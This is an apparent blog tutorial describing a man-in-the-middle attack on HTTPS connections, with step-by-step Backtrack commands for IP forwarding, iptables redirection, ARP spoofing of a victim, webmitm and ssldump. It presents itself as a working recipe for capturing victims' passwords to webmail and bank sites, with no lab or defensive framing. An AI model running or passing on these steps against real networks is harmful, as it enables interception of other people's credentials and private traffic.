Secure Sockets Layer (SSL) provides a secure communication channel between two peers. I am not going to discuss here that “How SSL works”. For that visit the link .This attack talks about HTTPS only. In case of HTTPS the user has usually possibility to decide whether to accept the certificate represented to her/him or not. Together with the lack of client peer authentication this opens possibility to man-in-the-middle attack which is a widely known feature of SSL. The attacker can fake the server to the client and create two secure channels, one to the client and one to the server.
Prerequisites
Any Spoofing Software: In man-in-the-middle attacks the attacker have to redirect the client’s communication to himself. Thus you need a software that has the feature of spoofing to implement the redirection.
Webmitm: As the communication is encrypted an active relay tool is required as simple TCP forwarding is not enough.
Ssldump: To decrypt data-packet that comes to your computer.
Note: Use Backtrack Operating System that has all tools installed already. This OS is designed specially for security and hacking purpose. The command that are used in this tutorial is also based on this OS but one can use this connect for any OS.
Attack Preparation:
Step 1. Turn on the ip forwarding so that packet will not drop on your computer.
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2. There should be some rule that will be follwed by firewall, if they are not add these entries in your firewall.
iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
Step 3. Spoof the victim’s computer so that data-packet routes through your computer instead of victim’s default gateway.
arpspoof -t “Victim’s ip” “Your ip”
Step 4. Turn on the webmitm
webmitm -d
Step5. Run ssldump so that it decrypt the log file for ssl entries.
ssldump -n -d -k webmitm.crt | tee ssldump.log
Now all you do is wait for the victim to log into google/gmail/yahoo/msn/hotmail or any other https connection, even a bank and you will see the passwords pop up in the terminal.
No comments:
Post a Comment